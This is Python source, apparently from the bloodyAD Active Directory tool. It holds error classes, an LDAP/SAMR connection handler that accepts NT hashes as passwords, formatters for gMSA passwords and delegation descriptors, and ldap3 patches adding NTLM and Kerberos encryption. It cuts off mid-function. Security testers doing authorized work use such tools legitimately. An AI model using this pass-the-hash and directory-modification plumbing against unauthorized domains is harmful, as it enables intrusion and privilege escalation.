

class BloodyError(Exception):
    pass


class LDAPError(BloodyError):
    pass


class ResultError(LDAPError):

    def __init__(self, result):
        self.result = result

        if self.result['result'] == 50:
            self.message = '[-] Could not modify object, the server reports insufficient rights: ' + self.result['message']
        elif self.result['result'] == 19:
            self.message = '[-] Could not modify object, the server reports a constrained violation: ' + self.result['message']
        else:
            self.message = '[-] The server returned an error: ' + self.result['message']

        super().__init__(self.message)


class NoResultError(LDAPError):

    def __init__(self, search_base, ldap_filter):
        self.filter = ldap_filter
        self.base = search_base
        self.message = f'[-] No object found in {self.base} with filter: {self.filter}'
        super().__init__(self.message)


class TooManyResultsError(LDAPError):

    def __init__(self, search_base, ldap_filter, entries):
        self.filter = ldap_filter
        self.base = search_base
        self.limit = 10
        self.entries = entries

        if len(self.entries) <= self.limit:
            self.results = "\n".join(entry['dn'] for entry in entries)
            self.message = f'[-] {len(self.entries)} objects found in {self.base} with filter: {ldap_filter}\n'
            self.message += '\tPlease put the full target DN\n'
            self.message += f'\tResult of query: \n{self.results}'
        else:
            self.message = f"\tMore than {self.limit} entries in {self.base} match {self.filter}"
            self.message += '\tPlease put the full target DN'

        super().__init__(self.message)



from bloodyAD import patch
import ldap3
import ssl
from impacket.dcerpc.v5 import transport, samr
from impacket.dcerpc.v5 import rpcrt
from dataclasses import dataclass

from bloodyAD.formatters import formatFunctionalLevel, formatGMSApass, formatSD, formatSchemaVersion, formatAccountControl
from bloodyAD import formatters

@dataclass
class Config:
    """Class for keeping all connection data for domain"""
    scheme: str = "ldap"
    host: str = ""
    domain: str = ""
    username: str = ""
    password: str = ""
    lmhash: str = "aad3b435b51404eeaad3b435b51404ee"
    nthash: str = ""
    kerberos: bool = False
    certificate: str = ""
    crt: str = ""
    key: str = ""
    url: str = ""

    def __post_init__(self):

        # Handle case where password is hashes
        if self.password and ':' in self.password:
            lmhash_maybe, nthash_maybe = self.password.split(':')
            try:
                int(nthash_maybe, 16)
            except ValueError:
                self.lmhash, self.nthash = None, None
            else:
                if len(lmhash_maybe) == 0 and len(nthash_maybe) == 32:
                    self.nthash = nthash_maybe
                    self.password = f'{self.lmhash}:{self.nthash}'
                elif len(lmhash_maybe) == 32 and len(nthash_maybe) == 32:
                    self.lmhash = lmhash_maybe
                    self.nthash = nthash_maybe
                    self.password = f'{self.lmhash}:{self.nthash}'
                else:
                    self.lmhash, self.nthash = None, None
        
        # Handle case where certificate is provided
        if self.certificate:
            self.key, self.crt = self.certificate.split(':')

        # Build the url from parameters given
        self.url = self.scheme + '://' + self.host


class ConnectionHandler():
    def __init__(self, args=None, config=None):
        if args:
            scheme = "ldaps" if args.secure else "ldap"
            cnf = Config(domain=args.domain, username=args.username, password=args.password, scheme=scheme, host=args.host, kerberos=args.kerberos, certificate=args.certificate)
        else:
            cnf = config

        self.conf = cnf
        self.samr = None
        self.ldap = None

    def getSamrConnection(self):
        if not self.samr:
            self.samr = self._connectSamr()
        return self.samr

    def _connectSamr(self):
        cnf = self.conf
        rpctransport = transport.SMBTransport(cnf.host, filename=r'\samr')

        if cnf.nthash:
            rpctransport.set_credentials(cnf.username, cnf.password, cnf.domain,
                                        lmhash=cnf.lmhash, nthash=cnf.nthash)
        else:
            rpctransport.set_credentials(cnf.username, cnf.password, cnf.domain)

        dce = rpctransport.get_dce_rpc()
        dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        dce.connect()
        dce.bind(samr.MSRPC_UUID_SAMR)
        return dce

    def getLdapConnection(self):
        if not self.ldap:
            self.ldap = self._connectLDAP()
        return self.ldap

    def _connectLDAP(self):
        cnf = self.conf
        ldap_server_kwargs = {
            'host' : cnf.url,
            'get_info' : ldap3.ALL, 
            'formatter': {
                'nTSecurityDescriptor':formatSD,
                'msDS-AllowedToActOnBehalfOfOtherIdentity':formatSD,
                'msDS-Behavior-Version':formatFunctionalLevel,
                'objectVersion':formatSchemaVersion,
                'userAccountControl':formatAccountControl,
                'msDS-ManagedPassword':formatGMSApass
                }
        }
        ldap_connection_kwargs = {'session_security' : 'ENCRYPT', 'raise_exceptions' : True}

        if cnf.crt:
            key = cnf.key if cnf.key else None
            tls = ldap3.Tls(local_private_key_file=key, local_certificate_file=cnf.crt, validate=ssl.CERT_NONE)
            ldap_server_kwargs['tls'] = tls
            if cnf.scheme != "ldaps":
                ldap_connection_kwargs.update({
                    'authentication': ldap3.SASL,
                    'sasl_mechanism': ldap3.EXTERNAL,
                    'auto_bind': ldap3.AUTO_BIND_TLS_BEFORE_BIND
                })
        elif cnf.kerberos:
            ldap_connection_kwargs.update({
                'authentication' : ldap3.SASL,
                'sasl_mechanism' : ldap3.KERBEROS
            })            
        else:
            ldap_connection_kwargs.update({
                'user' : '%s\\%s' % (cnf.domain, cnf.username),
                'password' : cnf.password,
                'authentication' : ldap3.NTLM, 
            })

        s = ldap3.Server(**ldap_server_kwargs)
        c = ldap3.Connection(s,**ldap_connection_kwargs)
        if cnf.crt and cnf.scheme == 'ldaps':
            c.open()
        else:
            c.bind()

        formatters.ldap_conn = c
        return c
    
    def close(self):
        self._closeSamr()
        self._closeLdap()
        
    def _closeSamr(self):
        if self.samr:
            self.samr.disconnect()
            self.samr = None
    
    def _closeLdap(self):
        if self.ldap:
            self.ldap.unbind()
            self.ldap = None

    def switchUser(self, username, password):
        self.conf.username = username
        self.conf.password = password
        if self.ldap:
            self.ldap.rebind(user='%s\\%s' % (self.conf.domain, username), password=password, authentication=ldap3.NTLM)
        self._closeSamr()




import ldap3

SIGN = 'sign'
ENCRYPT = 'ENCRYPT'

from ldap3.core.connection import *
def __init__(self,
                 server,
                 user=None,
                 password=None,
                 session_security=None,
                 auto_bind=AUTO_BIND_DEFAULT,
                 version=3,
                 authentication=None,
                 client_strategy=SYNC,
                 auto_referrals=True,
                 auto_range=True,
                 sasl_mechanism=None,
                 sasl_credentials=None,
                 check_names=True,
                 collect_usage=False,
                 read_only=False,
                 lazy=False,
                 raise_exceptions=False,
                 pool_name=None,
                 pool_size=None,
                 pool_lifetime=None,
                 cred_store=None,
                 fast_decoder=True,
                 receive_timeout=None,
                 return_empty_attributes=True,
                 use_referral_cache=False,
                 auto_escape=True,
                 auto_encode=True,
                 pool_keepalive=None,
                 source_address=None,
                 source_port=None,
                 source_port_list=None):
        conf_default_pool_name = get_config_parameter('DEFAULT_THREADED_POOL_NAME')
        self.connection_lock = RLock()  # re-entrant lock to ensure that operations in the Connection object are executed atomically in the same thread
        with self.connection_lock:
            if client_strategy not in CLIENT_STRATEGIES:
                self.last_error = 'unknown client connection strategy'
                if log_enabled(ERROR):
                    log(ERROR, '%s for <%s>', self.last_error, self)
                raise LDAPUnknownStrategyError(self.last_error)

            self.strategy_type = client_strategy
            self.user = user
            self.password = password

            if not authentication and self.user:
                self.authentication = SIMPLE
            elif not authentication:
                self.authentication = ANONYMOUS
            elif authentication in [SIMPLE, ANONYMOUS, SASL, NTLM]:
                self.authentication = authentication
            else:
                self.last_error = 'unknown authentication method'
                if log_enabled(ERROR):
                    log(ERROR, '%s for <%s>', self.last_error, self)
                raise LDAPUnknownAuthenticationMethodError(self.last_error)

            self.version = version
            self.auto_referrals = True if auto_referrals else False
            self.request = None
            self.response = None
            self.result = None
            self.bound = False
            self.listening = False
            self.closed = True
            self.last_error = None
            if auto_bind is False:  # compatibility with older version where auto_bind was a boolean
                self.auto_bind = AUTO_BIND_DEFAULT
            elif auto_bind is True:
                self.auto_bind = AUTO_BIND_NO_TLS
            else:
                self.auto_bind = auto_bind
            self.sasl_mechanism = sasl_mechanism
            self.sasl_credentials = sasl_credentials
            self._usage = ConnectionUsage() if collect_usage else None
            self.socket = None
            self.tls_started = False
            self.sasl_in_progress = False
            self.read_only = read_only
            self._context_state = []
            self._deferred_open = False
            self._deferred_bind = False
            self._deferred_start_tls = False
            self._bind_controls = None
            self._executing_deferred = False
            self.lazy = lazy
            self.pool_name = pool_name if pool_name else conf_default_pool_name
            self.pool_size = pool_size
            self.cred_store = cred_store
            self.pool_lifetime = pool_lifetime
            self.pool_keepalive = pool_keepalive
            self.starting_tls = False
            self.check_names = check_names
            self.raise_exceptions = raise_exceptions
            self.auto_range = True if auto_range else False
            self.extend = ExtendedOperationsRoot(self)
            self._entries = []
            self.fast_decoder = fast_decoder
            self.receive_timeout = receive_timeout
            self.empty_attributes = return_empty_attributes
            self.use_referral_cache = use_referral_cache
            self.auto_escape = auto_escape
            self.auto_encode = auto_encode
            self._digest_md5_kic = None
            self._digest_md5_kis = None
            self._digest_md5_kcc_cipher = None
            self._digest_md5_kcs_cipher = None
            self._digest_md5_sec_num = 0
            self.krb_ctx = None

            if session_security and not (self.authentication == NTLM or self.sasl_mechanism == GSSAPI):
                self.last_error = '"session_security" option only available for NTLM and GSSAPI'
                if log_enabled(ERROR):
                    log(ERROR, '%s for <%s>', self.last_error, self)
                raise LDAPInvalidValueError(self.last_error)
            self.session_security = session_security
            
            port_err = check_port_and_port_list(source_port, source_port_list)
            if port_err:
                if log_enabled(ERROR):
                    log(ERROR, port_err)
                raise LDAPInvalidPortError(port_err)
            # using an empty string to bind a socket means "use the default as if this wasn't provided" because socket
            # binding requires that you pass something for the ip if you want to pass a specific port
            self.source_address = source_address if source_address is not None else ''
            # using 0 as the source port to bind a socket means "use the default behavior of picking a random port from
            # all ports as if this wasn't provided" because socket binding requires that you pass something for the port
            # if you want to pass a specific ip
            self.source_port_list = [0]
            if source_port is not None:
                self.source_port_list = [source_port]
            elif source_port_list is not None:
                self.source_port_list = source_port_list[:]

            if isinstance(server, STRING_TYPES):
                server = Server(server)
            if isinstance(server, SEQUENCE_TYPES):
                server = ServerPool(server, ROUND_ROBIN, active=True, exhaust=True)

            if isinstance(server, ServerPool):
                self.server_pool = server
                self.server_pool.initialize(self)
                self.server = self.server_pool.get_current_server(self)
            else:
                self.server_pool = None
                self.server = server

            # if self.authentication == SIMPLE and self.user and self.check_names:
            #     self.user = safe_dn(self.user)
            #     if log_enabled(EXTENDED):
            #         log(EXTENDED, 'user name sanitized to <%s> for simple authentication via <%s>', self.user, self)

            if self.strategy_type == SYNC:
                self.strategy = SyncStrategy(self)
            elif self.strategy_type == SAFE_SYNC:
                self.strategy = SafeSyncStrategy(self)
            elif self.strategy_type == SAFE_RESTARTABLE:
                self.strategy = SafeRestartableStrategy(self)
            elif self.strategy_type == ASYNC:
                self.strategy = AsyncStrategy(self)
            elif self.strategy_type == LDIF:
                self.strategy = LdifProducerStrategy(self)
            elif self.strategy_type == RESTARTABLE:
                self.strategy = RestartableStrategy(self)
            elif self.strategy_type == REUSABLE:
                self.strategy = ReusableStrategy(self)
                self.lazy = False
            elif self.strategy_type == MOCK_SYNC:
                self.strategy = MockSyncStrategy(self)
            elif self.strategy_type == MOCK_ASYNC:
                self.strategy = MockAsyncStrategy(self)
            elif self.strategy_type == ASYNC_STREAM:
                self.strategy = AsyncStreamStrategy(self)
            else:
                self.last_error = 'unknown strategy'
                if log_enabled(ERROR):
                    log(ERROR, '%s for <%s>', self.last_error, self)
                raise LDAPUnknownStrategyError(self.last_error)

            # maps strategy functions to connection functions
            self.send = self.strategy.send
            self.open = self.strategy.open
            self.get_response = self.strategy.get_response
            self.post_send_single_response = self.strategy.post_send_single_response
            self.post_send_search = self.strategy.post_send_search

            if not self.strategy.no_real_dsa:
                self._do_auto_bind()
            # else:  # for strategies with a fake server set get_info to NONE if server hasn't a schema
            #     if self.server and not self.server.schema:
            #         self.server.get_info = NONE
            if log_enabled(BASIC):
                if get_library_log_hide_sensitive_data():
                    log(BASIC, 'instantiated Connection: <%s>', self.repr_with_sensitive_data_stripped())
                else:
                    log(BASIC, 'instantiated Connection: <%r>', self)
Connection.__init__ = __init__

def do_ntlm_bind(self,
                     controls):
        if log_enabled(BASIC):
            log(BASIC, 'start NTLM BIND operation via <%s>', self)
        self.last_error = None
        with self.connection_lock:
            if not self.sasl_in_progress:
                self.sasl_in_progress = True  # ntlm is same of sasl authentication
                try:
                    # additional import for NTLM
                    from ldap3.utils.ntlm import NtlmClient
                    domain_name, user_name = self.user.split('\\', 1)
                    self.ntlm_client = NtlmClient(user_name=user_name, domain=domain_name, password=self.password)
                    if self.session_security == ENCRYPT:
                        self.ntlm_client.confidentiality = True

                    # as per https://msdn.microsoft.com/en-us/library/cc223501.aspx
                    # send a sicilyPackageDiscovery request (in the bindRequest)
                    request = bind_operation(self.version, 'SICILY_PACKAGE_DISCOVERY', self.ntlm_client)
                    if log_enabled(PROTOCOL):
                        log(PROTOCOL, 'NTLM SICILY PACKAGE DISCOVERY request sent via <%s>', self)
                    response = self.post_send_single_response(self.send('bindRequest', request, controls))
                    if not self.strategy.sync:
                        _, result = self.get_response(response)
                    else:
                        result = response[0]
                    if 'server_creds' in result:
                        sicily_packages = result['server_creds'].decode('ascii').split(';')
                        if 'NTLM' in sicily_packages:  # NTLM available on server
                            request = bind_operation(self.version, 'SICILY_NEGOTIATE_NTLM', self.ntlm_client)
                            if log_enabled(PROTOCOL):
                                log(PROTOCOL, 'NTLM SICILY NEGOTIATE request sent via <%s>', self)
                            response = self.post_send_single_response(self.send('bindRequest', request, controls))
                            if not self.strategy.sync:
                                _, result = self.get_response(response)
                            else:
                                if log_enabled(PROTOCOL):
                                    log(PROTOCOL, 'NTLM SICILY NEGOTIATE response <%s> received via <%s>', response[0],
                                        self)
                                result = response[0]

                            if result['result'] == RESULT_SUCCESS:
                                request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', self.ntlm_client,
                                                         result['server_creds'])
                                if log_enabled(PROTOCOL):
                                    log(PROTOCOL, 'NTLM SICILY RESPONSE NTLM request sent via <%s>', self)
                                response = self.post_send_single_response(self.send('bindRequest', request, controls))
                                if not self.strategy.sync:
                                    _, result = self.get_response(response)
                                else:
                                    if log_enabled(PROTOCOL):
                                        log(PROTOCOL, 'NTLM BIND response <%s> received via <%s>', response[0], self)
                                    result = response[0]
                    else:
                        result = None
                finally:
                    self.sasl_in_progress = False

                if log_enabled(BASIC):
                    log(BASIC, 'done SASL NTLM operation, result <%s>', result)

                return result
Connection.do_ntlm_bind = do_ntlm_bind

from ldap3.protocol.sasl.kerberos import *
from ldap3.protocol.sasl.kerberos import _common_determine_target_name, _common_determine_authz_id_and_creds
def _common_process_end_token_get_security_layers(negotiated_token, session_security=None):
    """ Process the response we got at the end of our SASL negotiation wherein the server told us what
    minimum security layers we need, and return a bytearray for the client security layers we want.
    This function throws an error on a malformed token from the server.
    The ldap3 library does not support security layers, and only supports authentication with kerberos,
    so an error will be thrown for any tokens that indicate a security layer requirement.
    """
    if len(negotiated_token) != 4:
        raise LDAPCommunicationError("Incorrect response from server")

    server_security_layers = negotiated_token[0]
    if not isinstance(server_security_layers, int):
        server_security_layers = ord(server_security_layers)
    if server_security_layers in (0, NO_SECURITY_LAYER):
        if negotiated_token[1:] != '\x00\x00\x00':
            raise LDAPCommunicationError("Server max buffer size must be 0 if no security layer")
    security_layer = CONFIDENTIALITY_PROTECTION if session_security else NO_SECURITY_LAYER 
    if not (server_security_layers & security_layer):
        raise LDAPCommunicationError("Server doesn't support the security level asked")

    # this is here to encourage anyone implementing client security layers to do it
    # for both windows and posix
    client_security_layers = bytearray([security_layer, 0, 0, 0])
    return client_security_layers
ldap3.protocol.sasl.kerberos._common_process_end_token_get_security_layers = _common_process_end_token_get_security_layers

def _posix_sasl_gssapi(connection, controls):
    """ Performs a bind using the Kerberos v5 ("GSSAPI") SASL mechanism
    from RFC 4752 using the gssapi package that works natively on most
    posix operating systems.
    """
    target_name = gssapi.Name(_common_determine_target_name(connection), gssapi.NameType.hostbased_service)
    authz_id, creds = _common_determine_authz_id_and_creds(connection)

    ctx = gssapi.SecurityContext(name=target_name, mech=gssapi.MechType.kerberos, creds=creds,
                                 channel_bindings=get_channel_bindings(connection.socket))
    in_token = None
    try:
        while True:
            out_token = ctx.step(in_token)
            if out_token is None:
                out_token = ''
            result = send_sasl_negotiation(connection, controls, out_token)
            in_token = result['saslCreds']
            try:
                # This raised an exception in gssapi<1.1.2 if the context was
                # incomplete, but was fixed in
                # https://github.com/pythongssapi/python-gssapi/pull/70
                if ctx.complete:
                    break
            except gssapi.exceptions.MissingContextError:
                pass

        unwrapped_token = ctx.unwrap(in_token)
        client_security_layers = _common_process_end_token_get_security_layers(unwrapped_token.message, connection.session_security)
        out_token = ctx.wrap(bytes(client_security_layers)+authz_id, False)
        connection.krb_ctx = ctx
        return send_sasl_negotiation(connection, controls, out_token.message)
    except (gssapi.exceptions.GSSError, LDAPCommunicationError):
        abort_sasl_negotiation(connection, controls)
        raise
ldap3.protocol.sasl.kerberos._posix_sasl_gssapi = _posix_sasl_gssapi

def _windows_sasl_gssapi(connection, controls):
    """ Performs a bind using the Kerberos v5 ("GSSAPI") SASL mechanism
    from RFC 4752 using the winkerberos package that works natively on most
    windows operating systems.
    """
    target_name = _common_determine_target_name(connection)
    # initiation happens before beginning the SASL bind when using windows kerberos
    authz_id, _ = _common_determine_authz_id_and_creds(connection)
    gssflags = (
            winkerberos.GSS_C_MUTUAL_FLAG |
            winkerberos.GSS_C_SEQUENCE_FLAG |
            winkerberos.GSS_C_INTEG_FLAG |
            winkerberos.GSS_C_CONF_FLAG
    )
    _, ctx = winkerberos.authGSSClientInit(target_name, gssflags=gssflags)

    in_token = b''
    try:
        negotiation_complete = False
        while not negotiation_complete:
            # GSSAPI is a "client goes first" SASL mechanism. Send the first "response" to the server and
            # recieve its first challenge.
            # Despite this, we can get channel binding, which includes CBTs for windows environments computed from
            # the peer certificate, before starting.
            status = winkerberos.authGSSClientStep(ctx, base64.b64encode(in_token).decode('utf-8'),
                                                   channel_bindings=get_channel_bindings(connection.socket))
            # figure out if we're done with our sasl negotiation
            negotiation_complete = (status == winkerberos.AUTH_GSS_COMPLETE)
            out_token = winkerberos.authGSSClientResponse(ctx) or ''
            out_token_bytes = base64.b64decode(out_token)
            result = send_sasl_negotiation(connection, controls, out_token_bytes)
            in_token = result['saslCreds'] or b''

        winkerberos.authGSSClientUnwrap(ctx,base64.b64encode(in_token).decode('utf-8'))
        negotiated_token = ''
        if winkerberos.authGSSClientResponse(ctx):
            negotiated_token = base64.standard_b64decode(winkerberos.authGSSClientResponse(ctx))
        client_security_layers = _common_process_end_token_get_security_layers(negotiated_token, connection.session_security)
        # manually construct a message indicating use of authorization-only layer
        # see winkerberos example: https://github.com/mongodb/winkerberos/blob/master/test/test_winkerberos.py
        authz_only_msg = base64.b64encode(bytes(client_security_layers) + authz_id).decode('utf-8')
        winkerberos.authGSSClientWrap(ctx, authz_only_msg)
        out_token = winkerberos.authGSSClientResponse(ctx) or ''
        connection.krb_ctx = ctx
        return send_sasl_negotiation(connection, controls, base64.b64decode(out_token))
    except (winkerberos.GSSError, LDAPCommunicationError):
        abort_sasl_negotiation(connection, controls)
        raise
ldap3.protocol.sasl.kerberos._windows_sasl_gssapi = _windows_sasl_gssapi

from ldap3.strategy.base import *
def sending(self, ldap_message):
    if log_enabled(NETWORK):
        log(NETWORK, 'sending 1 ldap message for <%s>', self.connection)
    try:
        encoded_message = encode(ldap_message)
        if self.connection.sasl_mechanism == DIGEST_MD5 and self.connection._digest_md5_kic and not self.connection.sasl_in_progress:
            # If we are using DIGEST-MD5 and LDAP signing is enabled: add a signature to the message
            sec_num = self.connection._digest_md5_sec_num  # added underscore GC
            kic = self.connection._digest_md5_kic  # lowercase GC
            signature = bytes.fromhex(md5_hmac(kic, int(sec_num).to_bytes(4, 'big') + encoded_message)[0:20])
            payload = encoded_message + signature
            if self.connection._digest_md5_kcc_cipher:
                payload = self.connection._digest_md5_kcc_cipher.encrypt(payload)
            # RFC 2831 sign: encoded_message = sizeOf(encoded_message + signature + 0x0001 + secNum) + encoded_message + signature + 0x0001 + secNum
            # RFC 2831 encrypt: encoded_message = sizeOf(ciphertext + 0x0001 +secNum) + CIPHER(encoded_message + pad + signature) + 0x0001 + secNum
            encoded_message = int(len(payload) + 2 + 4).to_bytes(4, 'big') + payload + int(1).to_bytes(2, 'big') + int(sec_num).to_bytes(4, 'big')
            self.connection._digest_md5_sec_num += 1
        elif self.connection.session_security == ENCRYPT and not self.connection.sasl_in_progress:
            if self.connection.authentication == NTLM:
                # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/115f9c7d-bc30-4262-ae96-254555c14ea6
                encoded_message = self.connection.ntlm_client.seal(encoded_message)
            elif self.connection.sasl_mechanism == GSSAPI:
                if posix_gssapi_unavailable:
                    import winkerberos
                    winkerberos.authGSSClientWrap(self.connection.krb_ctx, base64.b64encode(encoded_message).decode('utf-8'), None, 1)
                    encoded_message = base64.b64decode(winkerberos.authGSSClientResponse(self.connection.krb_ctx))
                else:
                    encoded_message = self.connection.krb_ctx.wrap(encoded_message, True).message
            encoded_message = int(len(encoded_message)).to_bytes(4, 'big') + encoded_message

        self.connection.socket.sendall(encoded_message)
        if log_enabled(EXTENDED):
            log(EXTENDED, 'ldap message sent via <%s>:%s', self.connection, format_ldap_message(ldap_message, '>>'))
        if log_enabled(NETWORK):
            log(NETWORK, 'sent %d bytes via <%s>', len(encoded_message), self.connection)
    except socket.error as e:
        self.connection.last_error = 'socket sending error' + str(e)
        encoded_message = None
        if log_enabled(ERROR):
            log(ERROR, '<%s> for <%s>', self.connection.last_error, self.connection)
        # raise communication_exception_factory(LDAPSocketSendError, exc)(self.connection.last_error)
        raise communication_exception_factory(LDAPSocketSendError, type(e)(str(e)))(self.connection.last_error)
    if self.connection.usage:
        self.connection._usage.update_transmitted_message(self.connection.request, len(encoded_message))
BaseStrategy.sending = sending

from ldap3.strategy.sync import *
def receiving(self):
    """
    Receives data over the socket
    Checks if the socket is closed
    """
    messages = []
    receiving = True
    unprocessed = b''
    data = b''
    get_more_data = True
    # exc = None  # not needed here GC
    sasl_total_bytes_received = 0
    sasl_received_data = b''  # used to verify the signature
    sasl_next_packet = b''
    # sasl_signature = b'' # not needed here? GC
    # sasl_sec_num = b'' # used to verify the signature  # not needed here, reformatted to lowercase GC
    sasl_buffer_length = -1  # added, not initialized? GC
    while receiving:
        if get_more_data:
            try:
                data = self.connection.socket.recv(self.socket_size)
            except (OSError, socket.error, AttributeError) as e:
                self.connection.last_error = 'error receiving data: ' + str(e)
                try:  # try to close the connection before raising exception
                    self.close()
                except (socket.error, LDAPExceptionError):
                    pass
                if log_enabled(ERROR):
                    log(ERROR, '<%s> for <%s>', self.connection.last_error, self.connection)
                # raise communication_exception_factory(LDAPSocketReceiveError, exc)(self.connection.last_error)
                raise communication_exception_factory(LDAPSocketReceiveError, type(e)(str(e)))(self.connection.last_error)

            # If we are using DIGEST-MD5 and LDAP signing is set : verify & remove the signature from the message
            if (self.connection._digest_md5_kis or self.connection.session_security == ENCRYPT) and not self.connection.sasl_in_progress:
                data = sasl_next_packet + data

                if sasl_received_data == b'' or sasl_next_packet:
                    # Remove the sizeOf(encoded_message + signature + 0x0001 + secNum) from data.
                    sasl_buffer_length = int.from_bytes(data[0:4], "big")
                    data = data[4:]
                sasl_next_packet = b''
                sasl_total_bytes_received += len(data)
                sasl_received_data += data

                if sasl_total_bytes_received >= sasl_buffer_length:
                    # When the LDAP response is splitted accross multiple TCP packets, the SASL buffer length is equal to the MTU of each packet..Which is usually not equal to self.socket_size
                    # This means that the end of one SASL packet/beginning of one other....could be located in the middle of data
                    # We are using "sasl_received_data" instead of "data" & "unprocessed" for this reason

                    sasl_next_packet = sasl_received_data[sasl_buffer_length:]  # the last "data" variable may contain another sasl packet. We'll process it at the next iteration.

                    if self.connection.sasl_mechanism == DIGEST_MD5:
                        # structure of messages when LDAP signing is enabled : sizeOf(encoded_message + signature + 0x0001 + secNum) + encoded_message + signature + 0x0001 + secNum
                        sasl_sec_num = sasl_received_data[sasl_buffer_length - 4:sasl_buffer_length]
                        sasl_received_data = sasl_received_data[:sasl_buffer_length-6] # Removing secNum and the message type number to fit also encryption
                        sasl_buffer_length = len(sasl_received_data) # We can do that because len(ciphertext) == len(plaintext) for RC4
                        if self.connection._digest_md5_kcs_cipher:
                            # structure of messages when LDAP encryption is enabled: sizeOf(ciphertext + 0x0001 + secNum) + CIPHER(encoded_message + pad+ signature) + 0x0001 + secNum
                            sasl_received_data = self.connection._digest_md5_kcs_cipher.decrypt(sasl_received_data)
                        sasl_signature = sasl_received_data[sasl_buffer_length - 10:]
                        sasl_received_data = sasl_received_data[:sasl_buffer_length - 10]  # retrieve encoded_message
                        kis = self.connection._digest_md5_kis  # renamed to lowercase GC
                        calculated_signature = bytes.fromhex(md5_hmac(kis, sasl_sec_num + sasl_received_data)[0:20])
                        if sasl_signature != calculated_signature:
                            raise LDAPSignatureVerificationFailedError("Signature verification failed for the recieved LDAP message number " + str(int.from_bytes(sasl_sec_num, 'big')) + ". Expected signature " + calculated_signature.hex() + " but got " + sasl_signature.hex() + ".")

                    elif self.connection.authentication == NTLM:
                        sasl_received_data = self.connection.ntlm_client.unseal(sasl_received_data[:sasl_buffer_length])
                    
                    elif self.connection.sasl_mechanism == GSSAPI:
                        if posix_gssapi_unavailable:
                            import winkerberos
                            winkerberos.authGSSClientUnwrap(self.connection.krb_ctx, base64.b64encode(sasl_received_data[:sasl_buffer_length]).decode('utf-8'))
                            sasl_received_data = base64.b64decode(winkerberos.authGSSClientResponse(self.connection.krb_ctx))
                        else:
                            sasl_received_data = self.connection.krb_ctx.unwrap(sasl_received_data[:sasl_buffer_length]).message
                    
                    sasl_total_bytes_received = 0
                    unprocessed += sasl_received_data
                    sasl_received_data = b''
            else:
                unprocessed += data
        if len(data) > 0:
            length = BaseStrategy.compute_ldap_message_size(unprocessed)
            if length == -1:  # too few data to decode message length
                get_more_data = True
                continue
            if len(unprocessed) < length:
                get_more_data = True
            else:
                if log_enabled(NETWORK):
                    log(NETWORK, 'received %d bytes via <%s>', len(unprocessed[:length]), self.connection)
                messages.append(unprocessed[:length])
                unprocessed = unprocessed[length:]
                get_more_data = False
                if len(unprocessed) == 0:
                    receiving = False
        else:
            receiving = False

    if log_enabled(NETWORK):
        log(NETWORK, 'received %d ldap messages via <%s>', len(messages), self.connection)
    return messages
SyncStrategy.receiving = receiving

from ldap3.utils.ntlm import *
CLIENT = 'CLIENT'
SERVER = 'SERVER'
def __init__(self, domain, user_name, password):
    self.client_config_flags = 0
    self.exported_session_key = None
    self.negotiated_flags = None
    self.user_name = user_name
    self.user_domain = domain
    self.no_lm_response_ntlm_v1 = None
    self.client_blocked = False
    self.client_block_exceptions = []
    self.client_require_128_bit_encryption = None
    self.max_life_time = None
    self.client_signing_key = None
    self.client_handle = None
    self.sequence_number = 0
    self.server_handle = None
    self.server_signing_key = None
    self.integrity = False
    self.replay_detect = False
    self.sequence_detect = False
    self.confidentiality = False
    self.datagram = False
    self.identity = False
    self.client_supplied_target_name = None
    self.client_channel_binding_unhashed = None
    self.unverified_target_name = None
    self._password = password
    self.server_challenge = None
    self.server_target_name = None
    self.server_target_info = None
    self.server_version = None
    self.server_av_netbios_computer_name = None
    self.server_av_netbios_domain_name = None
    self.server_av_dns_computer_name = None
    self.server_av_dns_domain_name = None
    self.server_av_dns_forest_name = None
    self.server_av_target_name = None
    self.server_av_flags = None
    self.server_av_timestamp = None
    self.server_av_single_host_data = None
    self.server_av_channel_bindings = None
    self.server_av_flag_constrained = None
    self.server_av_flag_integrity = None
    self.server_av_flag_target_spn_untrusted = None
    self.current_encoding = None
    self.client_challenge = None
    self.server_target_info_raw = None
NtlmClient.__init__ = __init__

def create_negotiate_message(self):
        """
        Microsoft MS-NLMP 2.2.1.1
        """
        self.reset_client_flags()
        client_flag = [FLAG_REQUEST_TARGET,
                              FLAG_NEGOTIATE_128,
                              FLAG_NEGOTIATE_NTLM,
                              FLAG_NEGOTIATE_ALWAYS_SIGN,
                              FLAG_NEGOTIATE_OEM,
                              FLAG_NEGOTIATE_UNICODE,
                              FLAG_NEGOTIATE_EXTENDED_SESSIONSECURITY]
        if self.confidentiality:
            client_flag.append(FLAG_NEGOTIATE_SEAL)
        self.set_client_flag(client_flag)

        message = NTLM_SIGNATURE  # 8 bytes
        message += pack('<I', NTLM_MESSAGE_TYPE_NTLM_NEGOTIATE)  # 4 bytes
        message += pack('<I', self.client_config_flags)  # 4 bytes
        message += self.pack_field('', 40)  # domain name field  # 8 bytes
        if self.get_client_flag(FLAG_NEGOTIATE_VERSION):  # version 8 bytes - used for debug in ntlm
            message += pack_windows_version(True)
        else:
            message += pack_windows_version(False)
        return message
NtlmClient.create_negotiate_message = create_negotiate_message

def compute_nt_response(self):
        if not self.user_name and not self._password:  # anonymous authentication
            return b''

        self.client_challenge = urandom(8)
        temp = b''
        temp += pack('<B', 1)  # ResponseVersion - 1 byte
        temp += pack('<B', 1)  # HiResponseVersion - 1 byte
        temp += pack('<H', 0)  # Z(2)
        temp += pack('<I', 0)  # Z(4) - total Z(6)
        temp += self.pack_windows_timestamp()  # time - 8 bytes
        temp += self.client_challenge  # random client challenge - 8 bytes
        temp += pack('<I', 0)  # Z(4)
        temp += self.server_target_info_raw
        temp += pack('<I', 0)  # Z(4)
        response_key_nt = self.ntowf_v2()
        nt_proof_str = hmac.new(response_key_nt, self.server_challenge + temp, digestmod=hashlib.md5).digest()
        nt_challenge_response = nt_proof_str + temp
        if self.confidentiality:
            self.exported_session_key = self._kxkey(response_key_nt, nt_proof_str)
            self._sealkey()
            self._signkey()
        return nt_challenge_response
NtlmClient.compute_nt_response = compute_nt_response

def _kxkey(self, response_key_nt, nt_proof_str):
        session_base_key = hmac.new(response_key_nt, nt_proof_str, digestmod=hashlib.md5).digest()
        return session_base_key
setattr(NtlmClient, '_kxkey', _kxkey)

def _sealkey(self):
    from Cryptodome.Cipher import ARC4
